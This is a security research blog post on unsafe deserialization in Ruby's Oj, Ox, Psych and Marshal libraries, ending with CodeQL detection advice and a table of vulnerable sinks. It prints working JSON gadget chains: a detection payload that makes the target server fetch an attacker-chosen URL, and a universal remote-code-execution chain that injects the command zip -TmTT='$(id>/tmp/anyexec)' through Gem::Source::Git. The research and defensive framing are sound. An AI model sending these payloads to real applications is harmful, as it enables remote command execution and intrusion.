Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects

Can an attacker execute arbitrary commands on a remote server just by sending JSON? Yes, if the running code contains unsafe deserialization vulnerabilities. But how is that possible?

In this blog post, we’ll describe how unsafe deserialization vulnerabilities work and how you can detect them in Ruby projects. All samples in this blog post are made using the Oj JSON serialization library for Ruby, but that does not mean they are limited to this library. At the end of this blog post, we will link to a repository that contains working sample exploits that work for Oj (JSON), Ox (XML), Psych (YAML), and Marshal (custom binary format), and show you how CodeQL can detect such vulnerabilities. Understanding how unsafe deserialization works can help you avoid this class of bugs in its entirety instead of focusing on avoiding certain methods.

Step-by-step: Putting together a detection gadget chain for Oj

Many people have an idea of how the exploitation of deserialization vulnerabilities could work. But how does it really work? (It’s part magic and part sweat and tears.) In this section, we show how to build an unsafe deserialization detection gadget for Oj, a Ruby-based JSON deserialization library, that calls an external URL. This detection gadget is based on William Bowling’s (aka vakzz) universal deserialisation gadget for Marshal and Ruby 3.0.3 adapted to Oj and Ruby 3.3.

1. It starts with a class

Most of the time, unsafe deserialization vulnerabilities arise from the capability of a deserialization library to support polymorphism, which implies the ability to instantiate arbitrary classes or class-like structures specified in the serialized data. The attacker then chains those classes together to execute code on the system under exploitation. All used classes must typically be accessible by the exploited project. In this context, classes that are useful for a certain purpose, such as executing commands or code, are called gadgets. By combining those classes into a bigger exploit (for example, by nesting them), we get a so-called gadget chain. The ability to serialize and deserialize arbitrary constructs was long seen as a powerful feature, and it was originally not intended for code execution. In 2015, the public perception of this feature changed with the release of a blog post about widespread Java deserialization vulnerabilities by FoxGlove Security. In 2017, unsafe deserialization attacks against Java and .NET based JSON libraries were presented at BlackHat with the title “Friday the 13th: JSON Attacks”.

When using the (non-default) Ruby library named Oj for deserializing JSON, a project is vulnerable simply by having a construct such as:

data = Oj.load(untrusted_json)

The Oj library by default supports the instantiation of classes specified in JSON. It’s possible to disable this behavior by specifying an additional parameter or using Oj.safe_load instead.

As mentioned in the introduction, unsafe deserialization vulnerabilities are not limited to JSON; they can occur wherever arbitrary classes or class-like structures are deserialized from user-controlled data.

To instantiate a class named MyClass with a field called member that holds the content value, the following JSON has to be passed to a vulnerable Oj sink:

{
    "^o": "MyClass",
    "member": "value"
}

2. Now come the maps (hashes), lists, getters, setters, constructors, and more

While the instantiation of classes is the most common denominator for unsafe deserialization vulnerabilities, the next building blocks differ from language to language. While in Java and similar languages unsafe deserialization vulnerabilities sometimes make use of constructors, setters, and getters to initially trigger code execution, we can’t rely on them for Ruby deserialization vulnerabilities. Vakzz’s blog post is about the exploitation of Ruby’s binary Marshal serialization, which relies on a so-called magic method (a method invoked in the reconstruction of the serialized objects) named _load (similar to Java’s readObject) to trigger code execution. However, Oj does not invoke this magic method, so in order to trigger the execution of our gadget chain we can’t rely on this method and have to find something else.

To answer the question up front: what can we even use to trigger code execution in Oj?

The hash(code) method!

Oj is not the only deserialization library where we rely on the hash method as a kick-off for our gadget chain. The hash method is typically called on the key object when the deserialization library adds a key-value pair to a hashmap (simply called a hash itself in Ruby).
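This behavior can be observed in plain Ruby without any deserialization library. The following is a minimal sketch; HashProbe is a hypothetical, harmless class that only counts how often its hash method is called.

```ruby
# HashProbe is a hypothetical, harmless stand-in for a kick-off gadget.
class HashProbe
  attr_reader :hash_calls

  def initialize
    @hash_calls = 0
  end

  # Ruby calls #hash on an object when it is used as a Hash key.
  def hash
    @hash_calls += 1
    super
  end
end

probe = HashProbe.new
table = {}
table[probe] = "any" # inserting the key triggers probe.hash

puts "hash was called #{probe.hash_calls} time(s)"
```

A deserializer that rebuilds a hash(map) from attacker-supplied data performs the same kind of insertion, which is why the hash method is a convenient entry point.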

This table shows the kick-off methods for the popular serialization libraries in Ruby:

| Library | Input data | Kick-off method inside class |
| --- | --- | --- |
| Marshal (Ruby) | Binary | _load |
| Oj | JSON | hash (class needs to be put into hash(map) as key) |
| Ox | XML | hash (class needs to be put into hash(map) as key) |
| Psych (Ruby) | YAML | hash (class needs to be put into hash(map) as key), init_with |
| JSON (Ruby) | JSON | json_create ([see notes regarding json_create at end](#table-vulnerable-sinks)) |

Let’s create a small proof of concept to demonstrate kicking off our gadget chain with the hash method.

We assume that we have a class, such as the one following, available in the targeted Ruby project (hint: there won’t be such a gadget in real-world projects):

class SimpleClass
  def initialize(cmd)
    @cmd = cmd
  end

  def hash
    system(@cmd)
  end
end

A call to “hash” would execute the command in the “@cmd” member variable using “system.” Note that in the Oj deserialization process the constructor isn’t executed. Here, we use it to create a quick sample payload ourselves and dump the resulting JSON:

require 'oj'

simple = SimpleClass.new("open -a calculator") # command for macOS

json_payload = Oj.dump(simple)
puts json_payload

Note: while it might make sense to directly serialize single gadgets, serializing or even just debugging a whole gadget chain is typically dangerous, as it might trigger the execution of the chain during the serialization process (which won’t give you the expected result, but you’ll “exploit” your own system).

The payload JSON looks like this:

{
    "^o": "SimpleClass",
    "cmd": "open -a calculator"
}

If we now load this JSON with Oj.load nothing happens. Why? Because nobody actually calls the hash method.

data = Oj.load(json_payload)

So, no calculator for now.

But now the question is: how do we trigger the hash(code) method ourselves? We have to put the class we want to instantiate inside of a hash(map) as the key. If we now package our previous payload inside a hash(map) as a key, it looks like this in Oj’s serialization format:

A diagram depicting a key-value pair of a hashmap, where the key is set to a SimpleClass and the value is “any.”

The value of the hash(map) entry is set to “any.” Now, the command execution is triggered just by loading the JSON:

Oj.load(json_payload)

Et voilà: we started a calculator.

A screenshot of a macOS calculator that was started with the exploit described above.

3. Constructing a payload with gadgets

Now, in reality our targeted project won’t have a “SimpleClass” available that simply executes commands when its hash method is called. No software engineer would develop something like that (I hope 😅).

Sidenote: Java’s URL class performs DNS lookups when hashCode() or equals() are called. 🙈

We are required to use classes that are part of the Ruby project we’re analyzing or its dependencies. Preferably, we’d even want to use classes that are part of Ruby itself, and as such, are always available. How to find such classes is described in Elttam’s blog post from 2018 and in vakzz’s blog post from 2022.

We are now focusing on porting vakzz’s universal gadget chain for Marshal from 2022 to Oj and Ruby 3.3. The hard work of creating a working gadget chain has been mostly performed by vakzz; we reuse most of the parts here to assemble a gadget chain that works in recent versions of Ruby and in other deserialization libraries. The goal is to have a gadget chain that is able to call an arbitrary URL. Namely, we’re interested in getting a callback to our server to prove our ability to execute code (hopefully) without causing any further damage.

Disclaimer: this doesn’t mean that this detection gadget chain is harmless. Only use this against your own systems or systems where you have written permission to do so.

Now, vakzz’s gadget chain relied on the kick-off with a call to to_s (toString). to_s was triggered inside of the _load method of specification.rb. _load is a method that is triggered when an object is deserialized with Marshal. The Oj deserializer does not make use of _load or a similar method.

The rough instantiation process of a class as performed by Oj is as follows:

  1. Instantiate an empty shell of the class (without calling a constructor).
  2. Fill class fields directly (without calling setters).
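The two steps above can be modeled in a few lines of plain Ruby. This is a simplified sketch and not Oj’s actual implementation; the helper instantiate_without_constructor and the constructed flag are hypothetical and exist only for illustration.

```ruby
# A simplified model of the two instantiation steps. Not Oj's real code.
class MyClass
  attr_reader :member, :constructed

  def initialize
    @constructed = true # never set when the constructor is skipped
  end
end

# Hypothetical helper: builds an object from a class name and a field map.
def instantiate_without_constructor(class_name, fields)
  klass = Object.const_get(class_name)
  obj = klass.allocate # step 1: allocate without calling initialize
  fields.each do |name, value|
    obj.instance_variable_set("@#{name}", value) # step 2: no setters involved
  end
  obj
end

obj = instantiate_without_constructor("MyClass", { "member" => "value" })
p obj.member      # => "value"
p obj.constructed # => nil, because initialize never ran
```

Because neither a constructor nor a setter runs, a gadget chain needs a different trigger, such as the hash method discussed earlier.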

So, this normal deserialization process doesn’t trigger code execution by itself. But from the simple example above we know we can make calls to hash. For now, this has to be enough.

We now have learned that:

  • We can trigger the hash method on an arbitrary class (kick-off gadget).
  • We must call the to_s method on an internal member.

=> We have to find a bridge between the two:

For this process, you can use a tool such as CodeQL and write a custom query that you run on the ruby/ruby codebase. After some querying, I found a bridge in a class I’ve encountered before: the Requirement class. Its hash method indeed has a call to to_s:

def hash # :nodoc:
  requirements.map {|r| r.first == "~>" ? [r[0], r[1].to_s] : r }.sort.hash
end

At first, this might look a bit complicated for people who are not familiar with Ruby. So, we will break down the requirements for calling to_s on the inner gadget here:

  • We need an array of requirements that can be transformed by using the map function.
  • Inside this array we need another array, whose first element (r[0]) is equal to “~>”.
  • If we then place our next gadget inside of the second element (r[1]) the to_s method will be called on it!

Expressed in JSON this could look like this:

[ ["~>", <INNER_GADGETS> ] ]

We’re now able to bridge a call from hash to to_s and trigger the rest of the gadget chain.
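To see the bridge in isolation, here is a minimal sketch. RequirementLike is a hypothetical stand-in that copies only the hash method quoted above (it is not the real Gem::Requirement class), and ToSProbe is a hypothetical, harmless inner object that counts to_s calls.

```ruby
# Hypothetical stand-in that reuses the hash method body quoted above.
class RequirementLike
  attr_reader :requirements

  def hash
    requirements.map { |r| r.first == "~>" ? [r[0], r[1].to_s] : r }.sort.hash
  end
end

# Hypothetical, harmless inner "gadget" that records calls to to_s.
class ToSProbe
  attr_reader :to_s_calls

  def initialize
    @to_s_calls = 0
  end

  def to_s
    @to_s_calls += 1
    "probe"
  end
end

probe = ToSProbe.new

# Build the bridge the way a deserializer would: no constructor, field set directly.
bridge = RequirementLike.allocate
bridge.instance_variable_set(:@requirements, [["~>", probe]])

table = {}
table[bridge] = "any" # key insertion calls bridge.hash, which calls probe.to_s

puts "to_s was called #{probe.to_s_calls} time(s)"
```

In the real chain, the place of ToSProbe is taken by the next gadget, whose to_s method continues the chain.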

The next link in vakzz’s gadget chain is of type Gem::RequestSet::Lockfile. When to_s is called on an object of class Lockfile, it calls spec_groups on the same object:

def to_s
  out = []

  groups = spec_groups

  [..]

The method spec_groups enumerates the return value of the requests method which returns the sorted_requests field of a RequestSet. (Note that in Ruby versions before 3.3 this field was called sorted.)

What might not be obvious to people unfamiliar with Ruby is that the bare identifier requests actually calls the requests method.

def spec_groups
  requests.group_by {|request| request.spec.class }
end

In the same manner the method spec is called on the inner class Gem::Resolver::IndexSpecification while enumerating over the requests. The call to spec internally leads to a call to fetch_spec on the type Gem::Source, which in turn leads to a call of fetcher.fetch_path with source_uri:

def fetch_spec(name_tuple)
    fetcher = Gem::RemoteFetcher.fetcher

    spec_file_name = name_tuple.spec_name

    source_uri = enforce_trailing_slash(uri) + "#{Gem::MARSHAL_SPEC_DIR}#{spec_file_name}"

    [..]
    source_uri.path << ".rz"

    spec = fetcher.fetch_path source_uri
    [..]
end

source_uri itself is built from the internal uri attribute. This uri is of type URI::HTTP. Now, it seems straightforward and one might be inclined to use a normal URI object with an http or https scheme. That would somewhat work, but the resulting URL path could not be chosen completely freely, as the URI is parsed in those cases, making the shenanigans that come next impossible. So, vakzz found a way of using S3 as the scheme for a URI object. In JSON this would look like this:

{
  "^o": "URI::HTTP",
  "scheme": "s3",
  "host": "example.org/anyurl?",
  "port": "anyport","path": "/", "user": "anyuser", "password": "anypw"
}

In this sample the scheme of the URL is set to “s3” while the “host” (!) is set to “example.org/anyurl?”.

The uri attribute has the following content:

A screenshot of a Ruby debugger displaying the value of a “URI::HTTP” object.

One might notice that at least the host and the port look off in this sample.

The complete source_uri, before it is passed to fetcher.fetch_path, looks like this:

A screenshot of a Ruby debugger displaying the value of “source_uri.”

Now, since the scheme of this URI object is s3, the RemoteFetcher calls the fetch_s3 method, which signs the URL using the given username and password and creates an HTTPS URI out of it. It then calls fetch_https.

A screenshot of a Ruby debugger showing the contents of “public_uri”. The contents of “public_uri” follows in the text.

Here, we notice that the host and port of the URL look normal again. Luckily for us, every other addition was put after the question mark marking the query. So, our targeted URL will be called as we want.

#<URI::HTTPS https://example.org/anyurl?.s3.us-east-1.amazonaws.com/quick/Marshal.4.8/-.gemspec.rz?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=anyuser%2F20240412%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240412T120426Z&X-Amz-Expires=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=fd04386806e13500de55a3aec222c2de9094cba7112eb76b4d9912b48145977a>
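The effect of the trailing question mark in the “host” value can be reproduced with Ruby’s URI library. This is a minimal sketch: the URL template below is a simplified assumption that only mirrors the shape of the public_uri shown above, and the shortened query string is a placeholder.

```ruby
require "uri"

# Attacker-controlled "host" value from the payload above.
host = "example.org/anyurl?"

# Simplified assumption: the host is interpolated into a URL of this shape.
# The query string here is a shortened placeholder.
public_url = "https://#{host}.s3.us-east-1.amazonaws.com/quick/Marshal.4.8/-.gemspec.rz?X-Amz-Expires=86400"

parsed = URI.parse(public_url)
puts parsed.host  # the real host that will be contacted
puts parsed.path  # the attacker-chosen path
puts parsed.query # everything appended afterwards ends up in the query
```

Once the string is parsed again, only the part before the first slash counts as the host, and everything after the injected question mark is pushed into the query.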

After fetch_https has been called with our desired URL, the code of the Source class tries to inflate and store the downloaded content. In this detection scenario, our gadget should just call an external URL of our choice (for example, a service like Canarytokens or Burp Collaborator) so that we get a notification when the URL has been called. For that purpose, it is better if the execution of the exploit ends here, before the received data is extracted and stored.

When we put our detection gadget chain into a vulnerable Oj.load sink our defined URL is requested using a GET request. This request then looks like this (using Burp’s Collaborator):

A screenshot of Burp Collaborator depicting that the desired Collaborator URL was triggered via GET Request.

=> After our given URL was triggered, we know that we’ve detected a vulnerable application. This technique could also help detect an out-of-band execution of our JSON-based exploit.
(Note that this technique will not work if the targeted system disallows outbound connections or only allows connections to URLs that are part of an allow list.)

The next diagram shows how the gadget chain is triggered with a call to hash on the Gem::Requirement class and ends with a call to fetch_path on the Gem::Source class:

A diagram showing an overview of the gadget chain composed in the text above. It starts with the kick-off to the hash method of the Gem::Requirement class and ends with a fetch_path call on the inner URI object of a class of type URI::HTTP.

Extending the detection gadget to a full-fledged universal remote code execution chain

Now that we’ve built a gadget chain for detection we also want to know if a gadget chain leading to remote code execution (RCE) is doable.

The previously mentioned Marshal-based gadget chain from vakzz from April 2022 allowed remote code execution against Ruby 3.0.2 based projects. But this exact approach stopped working somewhere around Ruby 3.2. As mentioned before, at least one additional issue came up with Ruby 3.3.

So, we had to work around both to achieve remote code execution with Ruby 3.3.

In short: vakzz’s gadget chain uses the Gem::Source::Git class to execute commands, namely via the rev_parse method that is triggered via the add_GIT method inside of the Gem::RequestSet::Lockfile class we’ve seen before:

def rev_parse # :nodoc:
    hash = nil

    Dir.chdir repo_cache_dir do
      hash = Gem::Util.popen(@git, "rev-parse", @reference).strip
    end

    [..]
end

Here, we see that a certain Util.popen method is called, which itself calls IO.popen: a classical command injection sink! The popen method is called with a command from the member variable @git, followed by the string literal rev-parse as the first argument and a second member variable named @reference, also under the attacker’s control, as the second argument. Well, since we know we can likely control those member variables, this looks pretty interesting, right?

Now, there’s at least one problem: the method rev_parse wants to change the working directory to repo_cache_dir. And repo_cache_dir is defined as follows:

def repo_cache_dir # :nodoc:
  File.join @root_dir, "cache", "bundler", "git", "#{@name}-#{uri_hash}"
end

So, this method joins a directory path starting with the member variable @root_dir, then the static folders “cache,” “bundler,” and “git,” and then a folder name that is a combination of the member variable @name and uri_hash. uri_hash is a longer method, whose function can for our purposes be abbreviated as “the SHA-1 hash of the member variable @repository.”

All combined repo_cache_dir will return a path such as:

@root_dir/cache/bundler/git/@name-SHA1(@repository)
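As a minimal sketch, the path can be computed as follows. The helper repo_cache_dir_sketch is hypothetical, and it assumes that uri_hash reduces to the SHA-1 hex digest of @repository, as summarized above. The argument values are arbitrary examples.

```ruby
require "digest"

# Hypothetical helper that mirrors the path layout described above.
# Assumption: uri_hash is simply the SHA-1 hex digest of the repository string.
def repo_cache_dir_sketch(root_dir, name, repository)
  uri_hash = Digest::SHA1.hexdigest(repository)
  File.join(root_dir, "cache", "bundler", "git", "#{name}-#{uri_hash}")
end

path = repo_cache_dir_sketch("/tmp", "anyname", "anyrepo")
puts path
```

Since all three inputs are attacker-controlled member variables, the attacker can predict the exact folder name in advance, including the 40-character hash suffix.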

So, either we have to know of such a folder on the target system that we can point to using the three member variables in our control, or we have to create the folder ourselves. Now, knowing of such a folder on the target system might be a bit tricky, at least due to the @name + SHA-1 hash combination involved. But how would we create such a folder ourselves?

This need for an existing folder is actually one of the reasons vakzz’s gadget chain uses the first part we use as a detection at all. The previously mentioned fetch_spec method of the class Gem::Source executes mkdir_p on the given cache_dir in case the fetching and inflating of the given source_uri succeeded.

def fetch_spec(name_tuple)
  [..]

  cache_dir = cache_dir source_uri

  local_spec = File.join cache_dir, spec_file_name

  [..]

  spec = fetcher.fetch_path source_uri
  spec = Gem::Util.inflate spec

  if update_cache?
    require "fileutils"
    FileUtils.mkdir_p cache_dir

    File.open local_spec, "wb" do |io|
      io.write spec
    end
  end

  [..]
end

The local variable cache_dir is the result of calling the cache_dir method with source_uri, and we know that, thanks to the use of the S3 scheme, some shenanigans with URLs are possible that would otherwise not work. Now, since the file that’s downloaded from source_uri needs to be inflatable, we would change the URI::HTTP object of our previous detection gadget to something like:

{
  "^o": "URI::HTTP",
  "scheme": "s3",
  "host": "rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz?",
  "port": "/../../../../../../../../../../../../../tmp/cache/bundler/git/anyname-a3f72d677b9bbccfbe241d88e98ec483c72ffc95/",
  "path": "/", "user": "anyuser", "password": "anypw"
}

In this sample we load an existing inflatable file directly from Rubygems.org and make sure that all the folders in the following path exist:

/tmp/cache/bundler/git/anyname-a3f72d677b9bbccfbe241d88e98ec483c72ffc95/

The string “a3f72d677b9bbccfbe241d88e98ec483c72ffc95” is the SHA-1 hash of “anyrepo,” which we can use later on for creating the Git object. We now know that we’re able to create a folder that rev_parse can switch to before it executes the command line tool given in the @git member variable. The original exploit for Marshal used commands that were embedded in the deflated .rz file for the command execution.

The execution order of the old exploit chain was roughly:

  1. Download a .rz file containing deflated commands.
  2. Execute the command tee rev-parse with the input stream from the inflated .rz file (the file rev-parse now contains the commands).
  3. Execute the command sh rev-parse.

However, this full chain stopped working around Ruby 3.2.2, since the strip method inside rev_parse now raised an error:

`strip': invalid byte sequence in UTF-8 (Encoding::CompatibilityError)

The challenge

We now have a fun challenge on our hands because we need to find a new way to execute arbitrary commands.

We learned that we have the following skeleton for executing commands:

<arbitrary-bin> rev-parse <arbitrary-second-argument> 

The constraints are as follows:

  1. The binary to execute and the second argument are freely choosable.
  2. The first argument is always rev-parse.
  3. What is returned from this popen call should be readable as UTF-8 (on Linux) to allow additional executions.
  4. You can call popen as many times as you want with different binary and second argument combinations, as long as at most the last command combination fails.
  5. Additionally, it’s also possible to pass in a stream as a second argument.
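One consequence of this skeleton is worth making concrete: when IO.popen receives an array, Ruby passes each element to the program as a separate argument, without involving a shell. The sketch below assumes that Gem::Util.popen forwards its arguments to IO.popen as an array; the Ruby interpreter stands in for the arbitrary binary and simply prints the arguments it received.

```ruby
require "rbconfig"

# Stand-in for <arbitrary-bin>: the current Ruby interpreter, which here only
# prints the arguments it was started with.
bin = [RbConfig.ruby, "-e", "print ARGV.inspect"]

# Same shape as the skeleton: fixed first argument, freely chosen second argument.
output = IO.popen([*bin, "rev-parse", "$(echo not-expanded)"], &:read)

puts output
```

The second argument arrives verbatim, so shell syntax inside it is not evaluated by popen itself. The chosen binary has to be one that tolerates rev-parse as its first argument and does something useful with the second.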

A solution

While there are multiple solutions to this challenge (try it out yourself!) I searched for a solution using GTFOBins. GTFOBins are by their own description:

_“GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.”_

We’re basically looking for a utility that can somehow execute commands with its second argument or parameter.

Looking for GTFOBins that are usable for command execution, I settled on the zip binary as it’s available by default on many different Linux distributions. zip allows command execution via its -TT (--unzip-command) flag when the -T flag is set as well. (Note that zip might work differently under certain macOS versions.)

Now, there are two remaining problems:

  1. The first argument is always rev-parse, but calling -T -TT afterwards doesn’t work if there’s no (zip) file named rev-parse.
  2. We only control the second argument and cannot add more arguments, but we need both -T and -TT.

We solve the first problem simply by creating a zip file with the name rev-parse:

(The file we add to the zip doesn’t matter, but we assume that /etc/passwd exists on typical Unix systems and is world readable.)

zip rev-parse /etc/passwd

The second problem is addressed by putting both flags together, separated by m, as described here:

zip rev-parse -TmTT="$(id>/tmp/anyexec)"

This will execute the id command and store its output into /tmp/anyexec.

Putting it all together

To create a gadget chain that is able to execute code, we put the following pieces in order:

  1. Download any .rz file that can be inflated, which triggers the folder creation.
  2. Execute zip to create a zip file called rev-parse.
  3. Execute zip a second time to execute an arbitrary command.

The last zip execution looks like this in JSON format:

{
    "^o": "Gem::Resolver::SpecSpecification",
    "spec": {
        "^o": "Gem::Resolver::GitSpecification",
        "source": {
            "^o": "Gem::Source::Git",
            "git": "zip",
            "reference": "-TmTT=\"$(id>/tmp/anyexec)\"",
            "root_dir": "/tmp",
            "repository": "anyrepo",
            "name": "anyname"
        },
        "spec": {
            "^o": "Gem::Resolver::Specification",
            "name": "name",
            "dependencies": []
        }
    }
}

=> Now, we are able to execute commands (for example, calculators) by feeding a vulnerable application with our JSON.

Here we see the result of our test command. The output of id has been written to the file /tmp/anyexec:

A screenshot showing the contents of the /tmp/anyexec file which contains the output of the id command.

See the full gadget chain in the accompanying repository of this blog post. Using this gadget chain, we can execute arbitrary commands on vulnerable projects.

Detecting unsafe deserialization when the source code is available

The previously shown gadget chains allow you to detect instances of unsafe deserialization without having access to the source code of a project. However, if you have access to CodeQL and the source code of a project and want to detect instances of unsafe deserialization, you can utilize CodeQL’s deserialization of user-controlled data query. This query will detect code locations where untrusted data flows to unsafe deserialization sinks. This query is part of GitHub’s code scanning with CodeQL query set for Ruby and results would show up like this in the code scanning section:

A screenshot of the GitHub security tab depicting code scanning results. One result with the name “Deserialization of user-controlled data” is visible.

If you just want an overview of vulnerable sinks without any flow analysis, open the query named UnsafeDeserializationQuery.qll in Visual Studio Code with an installed CodeQL extension and click on “Quick Evaluation: isSink.”

This will return a list of all insecure deserialization sinks inside of your project (a CodeQL database of your project is required). For more information about this methodology see Find all sinks for a specific vulnerability type in part three of the CodeQL zero to hero blog series.

An overview of the different unsafe deserialization sinks in Ruby

The gadget chain shown in this blog post was observed to work up to Ruby 3.3.3 (released in June 2024). A repository was created containing exploits for the following deserialization libraries:

  • Oj (JSON)
  • Ox (XML)
  • Ruby YAML/Psych (when used unsafely)
  • Ruby Marshal (custom binary format) *

* The Marshal version of the gadget chain only works up to Ruby 3.2.4 (released in April 2024).

Here, we list the vulnerable sinks for a manual code review—code scanning/CodeQL from GitHub is already aware of all of these sinks.

Table: Vulnerable sinks

| Library | Unsafe sinks | Input data | Remark |
| --- | --- | --- | --- |
| Oj | Oj.load (if no safe mode is used), Oj.object_load | JSON | Safe mode available |
| Ox | Ox.parse_obj, Ox.load (if the unsafe object mode is used) | XML | (un)safe mode available |
| Psych (Ruby) | YAML.load (for older Ruby/Psych versions) *, YAML.unsafe_load | YAML | * Since Psych 4.0 no arbitrary Ruby classes are instantiated when YAML.load is used. Ruby 3.1 (released in December 2021) depends on Psych 4.0 by default. |
| Marshal (Ruby) | Marshal.load | Binary | Should be avoided as a serialization format. |
| JSON (Ruby) | JSON.load ** | JSON | ** Only a limited set of classes that have a json_create method defined can be used. Due to this constraint there seems to exist no gadget chain as part of Ruby or Rails that allows arbitrary code/command execution. |
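To illustrate the difference between a safe and an unsafe sink using only Ruby’s standard library, the following minimal sketch feeds a serialized object to YAML.safe_load. SinkProbe is a hypothetical, harmless class used only for this demonstration.

```ruby
require "yaml"

# SinkProbe is a hypothetical, harmless class used only for this demonstration.
class SinkProbe
  def initialize
    @member = "value"
  end
end

# Serialize an instance; the YAML output carries a tag naming the Ruby class.
yaml_payload = YAML.dump(SinkProbe.new)

rejected = false
begin
  # safe_load refuses to instantiate classes that are not explicitly permitted.
  YAML.safe_load(yaml_payload)
rescue Psych::DisallowedClass => e
  rejected = true
  puts "rejected: #{e.message}"
end

puts "payload was instantiated" unless rejected
```

Passing the same payload to YAML.unsafe_load would instantiate SinkProbe, which is the behavior a gadget chain depends on.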

Conclusion

In this blog post, we showed how an unsafe deserialization vulnerability can be detected and exploited in different ways. If you have access to the source code, the easiest way to detect unsafe deserialization vulnerabilities is to use GitHub code scanning with CodeQL on your repositories. If you want to deep dive into your code, you can use the CodeQL extension for Visual Studio Code for that.

Should you not have access to the source code of a project, you can make use of the detection gadgets we built up step by step in this blog post to detect unsafe deserialization vulnerabilities remotely. (The detection gadget calls a URL you’ve specified.) The post also explains how a universal remote code execution (RCE) gadget chain works, which you likely only want to use in lab settings. All gadget chains for the Marshal, YAML, Oj, and Ox deserialization libraries can be found in the accompanying repository.
